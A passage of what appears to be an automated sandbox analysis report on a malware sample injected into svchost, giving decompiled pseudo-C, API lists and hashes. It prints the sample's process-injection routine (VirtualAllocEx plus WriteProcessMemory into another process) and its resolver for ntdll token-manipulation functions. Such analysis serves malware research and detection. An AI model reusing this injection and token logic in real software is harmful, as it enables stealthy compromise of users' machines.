                                                                                				E00128CEE();
                                                                                				E0012C4D6();
                                                                                				E0012C4E2();
                                                                                				_push(0x132118);
                                                                                				E00122011();
                                                                                				if(E0012F04E(0) -  *0x132f14 > 0x1e) {
                                                                                					_t33 = E0012E819(1, _t49, _t51, _t47);
                                                                                					_t53 = _t53 + 0x10;
                                                                                					if(_t47 != _t33) {
                                                                                						if(E001226B2(_t33,  &_v256) != 0) {
                                                                                							E0012E8A1(_t45, 1, _t49, "rresolv",  &_v256);
                                                                                							_t53 = _t53 + 0x10;
                                                                                						}
                                                                                						_t47 = _t33;
                                                                                					}
                                                                                					 *0x132f14 = E0012F04E(0);
                                                                                				}
                                                                                				_t16 = E0012F04E(0);
                                                                                				_pop(_t36);
                                                                                				if(_t16 -  *0x132f10 >= 0xa) {
                                                                                					E00128328(_t36, _t45); // executed
                                                                                					 *0x132f10 = E0012F04E(0);
                                                                                				}
                                                                                				Sleep(0x3e8); // executed
                                                                                				goto L7;
                                                                                 			}

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 001288A5
                                                                                  • Part of subcall function 0012F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4), ref: 0012F089
                                                                                  • Part of subcall function 0012F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0012F093
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem$Sleep
                                                                                • String ID: localcfg$rresolv
                                                                                • API String ID: 1561729337-486471987
                                                                                • Opcode ID: 8161d7e00b03156da960b37192cd25656eea74d6a15109c73734038bb3897476
                                                                                • Instruction ID: c63f0e60fb16a7c1050a54e0ca7956ae62cb6a11fc85a18c8d9dba50c0bd5ecc
                                                                                • Opcode Fuzzy Hash: 8161d7e00b03156da960b37192cd25656eea74d6a15109c73734038bb3897476
                                                                                • Instruction Fuzzy Hash: 5421E4315493206AF314B7657D83F6E3AEDEB15720FA0042DF904960C3EFB5A9A082B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00124000(CHAR* _a4, signed int* _a8) {
                                                                                				void* _t3;
                                                                                				long _t6;
                                                                                				void* _t8;
                                                                                				signed int* _t9;
                                                                                
                                                                                				_t9 = _a8;
                                                                                				_t8 = 0;
                                                                                				 *_t9 =  *_t9 | 0xffffffff;
                                                                                				while(1) {
                                                                                					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
                                                                                					if(_t3 != 0xffffffff) {
                                                                                						break;
                                                                                					}
                                                                                					_t6 = GetLastError();
                                                                                					if(_t6 == 2 || _t6 == 3) {
                                                                                						L6:
                                                                                						return 0;
                                                                                					} else {
                                                                                						if(_t6 == 5) {
                                                                                							L9:
                                                                                							return 1;
                                                                                						}
                                                                                						Sleep(0x1f4);
                                                                                						_t8 = _t8 + 1;
                                                                                						if(_t8 < 0xa) {
                                                                                							continue;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                				}
                                                                                				 *_t9 = _t3;
                                                                                				goto L9;
                                                                                 			}

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,001322F8,001242B6,00000000,00000001,001322F8,00000000,?,001298FD), ref: 00124021
                                                                                • GetLastError.KERNEL32(?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 0012402C
                                                                                • Sleep.KERNEL32(000001F4,?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 00124046
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastSleep
                                                                                • String ID:
                                                                                • API String ID: 408151869-0
                                                                                • Opcode ID: 022ad9332d8ae613709ef17b6d0380d4585a19f5e5281caa92afae61b3883c43
                                                                                • Instruction ID: 68f5759faebe50439b18fc8729fe57be0492159d2bec965f3532ec5271183d76
                                                                                • Opcode Fuzzy Hash: 022ad9332d8ae613709ef17b6d0380d4585a19f5e5281caa92afae61b3883c43
                                                                                • Instruction Fuzzy Hash: DBF0A7312402116BD7364B28BC49B9A32A1FB85720F254B24F3B5E60E0C73058D19B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012DB67(long _a4, long _a8, CHAR* _a12, CHAR* _a16) {
                                                                                				char _v264;
                                                                                				signed int _t13;
                                                                                				void* _t17;
                                                                                				CHAR* _t18;
                                                                                				void* _t19;
                                                                                
                                                                                				_t13 = GetEnvironmentVariableA(_a12,  &_v264, 0x104);
                                                                                				if(_t13 == 0) {
                                                                                					return _t13 | 0xffffffff;
                                                                                				} else {
                                                                                					_t18 = _t19 + _t13 - 0x104;
                                                                                					if( *((char*)(_t18 - 1)) == 0x5c) {
                                                                                						_t18 = _t19 + _t13 - 0x105;
                                                                                						 *_t18 = 0;
                                                                                					}
                                                                                					lstrcpyA(_t18, _a16);
                                                                                					_t17 = CreateFileA( &_v264, _a4, 1, 0, _a8, 0x80, 0); // executed
                                                                                					return _t17;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • GetEnvironmentVariableA.KERNEL32(0012DC19,?,00000104), ref: 0012DB7F
                                                                                • lstrcpyA.KERNEL32(?,001328F8), ref: 0012DBA4
                                                                                • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000080,00000000), ref: 0012DBC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEnvironmentFileVariablelstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2536392590-0
                                                                                • Opcode ID: 15af1af5bacca64c32ed28aaa20e1258a42a9d08c1bab4e0760de0b40cb87a7d
                                                                                • Instruction ID: 94924df9cbd6fd8fffaa2e3f08d86bc8439997bf02f18cc4e91c59ca235f78e5
                                                                                • Opcode Fuzzy Hash: 15af1af5bacca64c32ed28aaa20e1258a42a9d08c1bab4e0760de0b40cb87a7d
                                                                                • Instruction Fuzzy Hash: 2CF0B470100209ABEF11DF64EC59FD93BA9BB14348F204194FB55A40D0D7F2D995CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012EC54() {
                                                                                				long _v8;
                                                                                				struct _FILETIME _v16;
                                                                                				signed int _t11;
                                                                                
                                                                                				GetSystemTimeAsFileTime( &_v16);
                                                                                				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
                                                                                				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
                                                                                				 *0x1336cc = _t11;
                                                                                				return _t11;
                                                                                 			}

                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0012EC5E
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0012EC72
                                                                                • GetTickCount.KERNEL32 ref: 0012EC78
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$CountFileInformationSystemTickVolume
                                                                                • String ID:
                                                                                • API String ID: 1209300637-0
                                                                                • Opcode ID: 68d3bf02357f4425ea8b9fdcd0a76f307c6d336f0749b9cbf0450f8ed573632d
                                                                                • Instruction ID: d4054d800dbaf85568f970fe54431af38e034b2b8488932c47fd53d1e6d4553d
                                                                                • Opcode Fuzzy Hash: 68d3bf02357f4425ea8b9fdcd0a76f307c6d336f0749b9cbf0450f8ed573632d
                                                                                • Instruction Fuzzy Hash: C2E09AF5810104BFEB05ABB0DD5AE6B77FCEB08214F500650B911D64A0DA709A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E001230B5() {
                                                                                				char _v132;
                                                                                				char* _t9;
                                                                                				void* _t14;
                                                                                				void* _t15;
                                                                                
                                                                                				E0012EE2A(_t14,  &_v132, 0, 0x80);
                                                                                				gethostname( &_v132, 0x80); // executed
                                                                                				_t9 =  &_v132;
                                                                                				__imp__#52(_t9, _t15); // executed
                                                                                				if(_t9 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc))))));
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 001230D8
                                                                                • gethostbyname.WS2_32(?), ref: 001230E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostname
                                                                                • String ID:
                                                                                • API String ID: 3961807697-0
                                                                                • Opcode ID: 83a9d47a095837eb79c59e0f0cb9fdf02d78cdb41a49e6f0228922f4b185857d
                                                                                • Instruction ID: 7b3afb5d4fb6e35f1aec6c925cc34463024e65255898959e6f4fbdc801a57d7a
                                                                                • Opcode Fuzzy Hash: 83a9d47a095837eb79c59e0f0cb9fdf02d78cdb41a49e6f0228922f4b185857d
                                                                                • Instruction Fuzzy Hash: 83E065719001299BCF009BA8EC89F8B77ECBB08304F080061F905E3250EA34E50487A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled heap-free wrapper. The sub-call E0012EBA0 queries the block with
   GetProcessHeap/HeapSize (see APIs below) before the block is released. */
E0012EC2E(void* _a4) {
	void* _t2;
	char _t5;
	void* _t7;

	_t7 = _a4;
	if(_t7 != 0) {
		E0012EBA0(_t7);
		_t5 = RtlFreeHeap(GetProcessHeap(), 0, _t7); // executed
		return _t5;
	}
	return _t2; // decompiler artifact: for a NULL argument the return value is undefined
}

Instruction addresses: 0x0012ec2f, 0x0012ec35, 0x0012ec38, 0x0012ec48, 0x00000000, 0x0012ec48, 0x0012ec4f

APIs
  • Part of subcall function 0012EBA0: GetProcessHeap.KERNEL32(00000000,00000000,0012EC0A,00000000,80000001,?,0012DB55,7FFF0001), ref: 0012EBAD
  • Part of subcall function 0012EBA0: HeapSize.KERNEL32(00000000,?,0012DB55,7FFF0001), ref: 0012EBB4
• GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
• RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$Process$FreeSize
• String ID:
• API String ID: 1305341483-0
• Opcode ID: 78b66611c6ba1ea1a328695dbe96bd35767d88d4e7807a6fa3a78f315ddb9f56
• Instruction ID: 67538eae45f11f7b0c6c50f71dc62bf541f4b8539a59d43b9ec8503110b92c7a
• Opcode Fuzzy Hash: 78b66611c6ba1ea1a328695dbe96bd35767d88d4e7807a6fa3a78f315ddb9f56
• Instruction Fuzzy Hash: 4DC012324066306BC5522750BC1DF9B6B98DF49712F090409F405661508760989046E1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled heap-allocate wrapper: allocates _a4 bytes from the process heap and
   hands the new block to E0012EB74, which queries it with HeapSize (see APIs below). */
E0012EBCC(long _a4) {
	void* _t3;
	void* _t7;

	_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
	_t7 = _t3;
	E0012EB74(_t7); // called even when the allocation failed (_t7 == NULL)
	return _t7;
}

Instruction addresses: 0x0012ebda, 0x0012ebe0, 0x0012ebe3, 0x0012ebec

APIs
• GetProcessHeap.KERNEL32(00000000,00000000,80000001,0012EBFE,7FFF0001,?,0012DB55,7FFF0001), ref: 0012EBD3
• RtlAllocateHeap.NTDLL(00000000,?,0012DB55,7FFF0001), ref: 0012EBDA
  • Part of subcall function 0012EB74: GetProcessHeap.KERNEL32(00000000,00000000,0012EC28,00000000,?,0012DB55,7FFF0001), ref: 0012EB81
  • Part of subcall function 0012EB74: HeapSize.KERNEL32(00000000,?,0012DB55,7FFF0001), ref: 0012EB88
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$Process$AllocateSize
• String ID:
• API String ID: 2559512979-0
• Opcode ID: 548288ef3590879f12ef754dc08b6738c36cd0556f61ae333362d8cf02ccdbe4
• Instruction ID: 8fc6b8cee8275288de93ca6ba7ea9dedc4d25efe114c6e4cb92e3340cb7e67bf
• Opcode Fuzzy Hash: 548288ef3590879f12ef754dc08b6738c36cd0556f61ae333362d8cf02ccdbe4
• Instruction Fuzzy Hash: 92C08C336086306BC60227A4BC0CE9A3ED8EF0C3A2F080004F609C2960CB30888087A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• recv.WS2_32(000000C8,?,00000000,0012CA44), ref: 0012F476
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 83627207fccccd4427503f10920ec2326dba184b18a1ac8fe21b36340bc6c3cf
• Instruction ID: 39830ca35329c2282a7cfca66dcb00adac66e9f69e8854df150730fb17dfd942
• Opcode Fuzzy Hash: 83627207fccccd4427503f10920ec2326dba184b18a1ac8fe21b36340bc6c3cf
• Instruction Fuzzy Hash: 39F01272201599ABDB11AE59EC84CAB3BADFB89350B050135FA14D7110D771D8618760
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 37%
/* Decompiled socket probe: E0012F428 receives _a4 and the low 16 bits of _a8 (most likely
   a port number) and returns a value that is treated as a socket handle. A positive handle
   counts as success and is closed at once; __imp__#3 is WS2_32 ordinal 3, closesocket
   (see APIs below). Returns 1 on success, 0 otherwise. */
E00121978(intOrPtr _a4, signed short _a8) {
	void* _t4;
	void* _t8;

	_t8 = 0;
	_t4 = E0012F428(_a4, _a8 & 0x0000ffff);
	if(_t4 > 0) {
		_t8 = 1; // executed
		__imp__#3(_t4); // executed: closesocket
	}
	return _t8;
}

Instruction addresses: 0x00121983, 0x00121985, 0x0012198e, 0x00121991, 0x00121992, 0x00121992, 0x0012199b

APIs
• closesocket.WS2_32(00000000), ref: 00121992
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
• Opcode ID: d195f59faca06a005e7432012b8ca13ca31fad63a1b43b64588108abd577a1c1
• Instruction ID: d31c96be25bd0f8654fde4363a9fe0666f46eb4acfb1fd1dd900b56e5b75177b
• Opcode Fuzzy Hash: d195f59faca06a005e7432012b8ca13ca31fad63a1b43b64588108abd577a1c1
• Instruction Fuzzy Hash: CAD012261486327A96113759BC1587FABECDF59662B11843AFC48D0150D734CC928395
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled lookup over a circular linked list anchored at 0x1320e4 (the list is empty
   when the head pointer points back at itself). Each node carries a numeric id at +0xc and
   a NUL-terminated name at +0x10; _a4 == 0xffffffff matches any id and _a8 == NULL matches
   any name. Returns the first matching node or 0. */
E0012DD84(intOrPtr _a4, CHAR* _a8) {
	CHAR* _t5; // declaration missing from the decompiler output
	intOrPtr _t7;
	int _t10;
	intOrPtr* _t12;
	intOrPtr _t13;
	void* _t14;

	_t12 = 0x1320e4;
	_t14 =  *0x1320e4 - 0x1320e4; // 0x610f68
	if(_t14 == 0) {
		L6:
		return 0;
	} else {
		goto L1;
	}
	do {
		L1:
		_t7 = _a4;
		_t13 =  *_t12;
		if(_t7 == 0xffffffff ||  *((intOrPtr*)(_t13 + 0xc)) == _t7) {
			if(_a8 == 0) {
				L8:
				return _t13;
			}
			_t5 = _t13 + 0x10; // 0x80000011
			_t10 = lstrcmpiA(_t5, _a8); // executed: case-insensitive name compare
			if(_t10 == 0) {
				goto L8;
			}
		}
		_t12 =  *_t12; // advance to the next node
	} while ( *_t12 != 0x1320e4); // stop when the list wraps back to the head
	goto L6;
}

Instruction addresses: 0x0012dd8c, 0x0012dd8e, 0x0012dd94, 0x0012ddc5, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0012dd96, 0x0012dd96, 0x0012dd96, 0x0012dd9a, 0x0012dd9f, 0x0012ddab, 0x0012ddcb, 0x00000000, 0x0012ddcb, 0x0012ddb1, 0x0012ddb5, 0x0012ddbd, 0x00000000, 0x00000000, 0x0012ddbd, 0x0012ddbf, 0x0012ddc1, 0x00000000

APIs
• lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0012DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0012E3A7,000000F0), ref: 0012DDB5
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: 74f40d3dfdab2731e268a6c5afbe1f60cb96a40b3647e3ca4907cb4ed6dd940c
• Instruction ID: 12b9619aed163569d6eb98e363865ee244640b6b347cbbc5ab57eb404ef410f5
• Opcode Fuzzy Hash: 74f40d3dfdab2731e268a6c5afbe1f60cb96a40b3647e3ca4907cb4ed6dd940c
• Instruction Fuzzy Hash: B9F08C35200A66CBCB24CEA4F884656B3E8EB85325F14493EE159D21D0D730DCA9CB11
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled self-injection routine. It copies its own image (GetModuleHandleA(0)) into
   the target process _a8: the image size is read from the PE optional header (e_lfanew at
   +0x3c, SizeOfImage at +0x50), a local working copy is built with VirtualAlloc, a region of
   the same size is reserved in the target with VirtualAllocEx as 0x40 (PAGE_EXECUTE_READWRITE),
   and the copy is written with WriteProcessMemory. The helpers E0012EE08 and E001262B7 are not
   shown here; from their arguments they appear to populate the local copy and adjust it for the
   remote base. On success *_a16 receives the remote base and *_a12 the address in the target
   that corresponds to the local address _a4. Returns 1 on success, 0 on any failure. The
   VirtualAllocEx/WriteProcessMemory pair against a foreign process handle is the behaviour
   behind the foreign-memory and PE-injection signatures of this report. */
E0012637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
	void* _v8;
	void* _t15;
	void* _t16;
	long _t26;
	struct HINSTANCE__* _t32;
	void* _t37;

	if(_a8 != 0) {
		_t32 = GetModuleHandleA(0); // own image base
		_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50); // OptionalHeader.SizeOfImage
		_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // MEM_COMMIT, PAGE_READWRITE
		_v8 = _t15;
		if(_t15 == 0) {
			L5:
			_t16 = 0;
		} else {
			E0012EE08(_t15, _t32, _t26);
			_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // MEM_COMMIT, PAGE_EXECUTE_READWRITE
			if(_t37 == 0) {
				goto L5;
			} else {
				E001262B7(_v8, _t37);
				if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
					 *_a16 = _t37;
					 *_a12 = _t37 - _t32 + _a4; // rebase _a4 from the local to the remote image
					_t16 = 1;
				} else {
					goto L5;
				}
			}
		}
		return _t16;
	} else {
		return 0;
	}
}

Instruction addresses: 0x00126384, 0x00126395, 0x0012639a, 0x001263a9, 0x001263af, 0x001263b4, 0x001263f5, 0x001263f5, 0x001263b6, 0x001263b9, 0x001263d0, 0x001263d4, 0x00000000, 0x001263d6, 0x001263da, 0x001263f3, 0x001263fc, 0x00126406, 0x0012640a, 0x00000000, 0x00000000, 0x00000000, 0x001263f3, 0x001263d4, 0x0012640f, 0x00126386, 0x00126389, 0x00126389

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00129816,EntryPoint), ref: 0012638F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00129816,EntryPoint), ref: 001263A9
• VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 001263CA
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 001263EB
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$HandleMemoryModuleProcessWrite
• String ID:
• API String ID: 1965334864-0
• Opcode ID: b81041bf5c8492fbd11bd98d085fd6c4137d84ec8d92a372933d9f48218a15ee
• Instruction ID: fb8143a50bb949e0e4640a13093224fb2570f88beaa459d496322f78986a22ce
• Opcode Fuzzy Hash: b81041bf5c8492fbd11bd98d085fd6c4137d84ec8d92a372933d9f48218a15ee
• Instruction Fuzzy Hash: 241133B2600229BFDB259F65EC49F9B3FA8EB057A5F114024F909E7290E771DD508AA0
Uniqueness
Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00121000() {
                                                                                				struct HINSTANCE__* _t2;
                                                                                				_Unknown_base(*)()* _t3;
                                                                                				signed int _t4;
                                                                                				struct HINSTANCE__* _t5;
                                                                                				_Unknown_base(*)()* _t6;
                                                                                				_Unknown_base(*)()* _t7;
                                                                                				_Unknown_base(*)()* _t8;
                                                                                				struct HINSTANCE__* _t9;
                                                                                				_Unknown_base(*)()* _t10;
                                                                                				_Unknown_base(*)()* _t11;
                                                                                				_Unknown_base(*)()* _t12;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				_Unknown_base(*)()* _t14;
                                                                                				_Unknown_base(*)()* _t15;
                                                                                				_Unknown_base(*)()* _t16;
                                                                                				struct HINSTANCE__* _t17;
                                                                                				_Unknown_base(*)()* _t18;
                                                                                				_Unknown_base(*)()* _t19;
                                                                                				_Unknown_base(*)()* _t20;
                                                                                				struct HINSTANCE__* _t21;
                                                                                				_Unknown_base(*)()* _t22;
                                                                                				_Unknown_base(*)()* _t23;
                                                                                				struct HINSTANCE__* _t25;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				struct HINSTANCE__* _t27;
                                                                                				struct HINSTANCE__* _t28;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				struct HINSTANCE__* _t30;
                                                                                				struct HINSTANCE__* _t31;
                                                                                				struct HINSTANCE__* _t32;
                                                                                				struct HINSTANCE__* _t33;
                                                                                				signed int _t34;
                                                                                				signed int _t35;
                                                                                
                                                                                 				_t2 =  *0x133918; // 0x0 (cached HMODULE of ntdll.dll)
                                                                                 				_t35 = _t34 | 0xffffffff; // pending error code: -1 if the first export cannot be resolved
                                                                                				if(_t2 != 0) {
                                                                                					L3:
                                                                                 					// 0x13391c..0x133954 hold the 15 resolved ntdll export pointers; any empty slot triggers a full re-resolution
                                                                                 					if( *0x13391c == 0 ||  *0x133920 == 0 ||  *0x133924 == 0 ||  *0x133928 == 0 ||  *0x13392c == 0 ||  *0x133930 == 0 ||  *0x133934 == 0 ||  *0x133938 == 0 ||  *0x13393c == 0 ||  *0x133940 == 0 ||  *0x133944 == 0 ||  *0x133948 == 0 ||  *0x13394c == 0 ||  *0x133950 == 0 ||  *0x133954 == 0) {
                                                                                						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
                                                                                						 *0x13391c = _t3;
                                                                                						if(_t3 == 0) {
                                                                                							L34:
                                                                                							_t4 = _t35;
                                                                                						} else {
                                                                                							_t5 =  *0x133918; // 0x0
                                                                                							_t35 = 0xfffffffe;
                                                                                							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
                                                                                							 *0x133920 = _t6;
                                                                                							if(_t6 == 0) {
                                                                                								goto L34;
                                                                                							} else {
                                                                                								_t25 =  *0x133918; // 0x0
                                                                                								_t35 = 0xfffffffd;
                                                                                								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
                                                                                								 *0x133924 = _t7;
                                                                                								if(_t7 == 0) {
                                                                                									goto L34;
                                                                                								} else {
                                                                                									_t30 =  *0x133918; // 0x0
                                                                                									_t35 = 0xfffffffc;
                                                                                									_t8 = GetProcAddress(_t30, "RtlFreeSid");
                                                                                									 *0x133928 = _t8;
                                                                                									if(_t8 == 0) {
                                                                                										goto L34;
                                                                                									} else {
                                                                                										_t9 =  *0x133918; // 0x0
                                                                                										_t35 = 0xfffffffb;
                                                                                										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
                                                                                										 *0x13392c = _t10;
                                                                                										if(_t10 == 0) {
                                                                                											goto L34;
                                                                                										} else {
                                                                                											_t26 =  *0x133918; // 0x0
                                                                                											_t35 = 0xfffffffa;
                                                                                											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
                                                                                											 *0x133930 = _t11;
                                                                                											if(_t11 == 0) {
                                                                                												goto L34;
                                                                                											} else {
                                                                                												_t31 =  *0x133918; // 0x0
                                                                                												_t35 = 0xfffffff9;
                                                                                												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
                                                                                												 *0x133934 = _t12;
                                                                                												if(_t12 == 0) {
                                                                                													goto L34;
                                                                                												} else {
                                                                                													_t13 =  *0x133918; // 0x0
                                                                                													_t35 = 0xfffffff8;
                                                                                													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
                                                                                													 *0x133938 = _t14;
                                                                                													if(_t14 == 0) {
                                                                                														goto L34;
                                                                                													} else {
                                                                                														_t27 =  *0x133918; // 0x0
                                                                                														_t35 = 0xfffffff7;
                                                                                														_t15 = GetProcAddress(_t27, "NtClose");
                                                                                														 *0x13393c = _t15;
                                                                                														if(_t15 == 0) {
                                                                                															goto L34;
                                                                                														} else {
                                                                                															_t32 =  *0x133918; // 0x0
                                                                                															_t35 = 0xfffffff6;
                                                                                															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
                                                                                															 *0x133940 = _t16;
                                                                                															if(_t16 == 0) {
                                                                                																goto L34;
                                                                                															} else {
                                                                                																_t17 =  *0x133918; // 0x0
                                                                                																_t35 = 0xfffffff5;
                                                                                																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
                                                                                																 *0x133944 = _t18;
                                                                                																if(_t18 == 0) {
                                                                                																	goto L34;
                                                                                																} else {
                                                                                																	_t28 =  *0x133918; // 0x0
                                                                                																	_t35 = 0xfffffff4;
                                                                                																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
                                                                                																	 *0x133948 = _t19;
                                                                                																	if(_t19 == 0) {
                                                                                																		goto L34;
                                                                                																	} else {
                                                                                																		_t33 =  *0x133918; // 0x0
                                                                                																		_t35 = 0xfffffff3;
                                                                                																		_t20 = GetProcAddress(_t33, "NtFilterToken");
                                                                                																		 *0x13394c = _t20;
                                                                                																		if(_t20 == 0) {
                                                                                																			goto L34;
                                                                                																		} else {
                                                                                																			_t21 =  *0x133918; // 0x0
                                                                                																			_t35 = 0xfffffff2;
                                                                                																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
                                                                                																			 *0x133950 = _t22;
                                                                                																			if(_t22 == 0) {
                                                                                																				goto L34;
                                                                                																			} else {
                                                                                																				_t29 =  *0x133918; // 0x0
                                                                                																				_t35 = 0xfffffff1;
                                                                                																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
                                                                                																				 *0x133954 = _t23;
                                                                                 																				_t1 = _t35 + 0x10; // -15 + 0x10 = 1: success value once all 15 exports resolved
                                                                                 																				_t4 = _t1;
                                                                                																				if(_t23 == 0) {
                                                                                																					goto L34;
                                                                                																				}
                                                                                																			}
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                 						return _t4; // 1 on success, -n when the n-th export (in resolution order) failed to resolve
                                                                                					} else {
                                                                                 						return 1; // every slot already populated
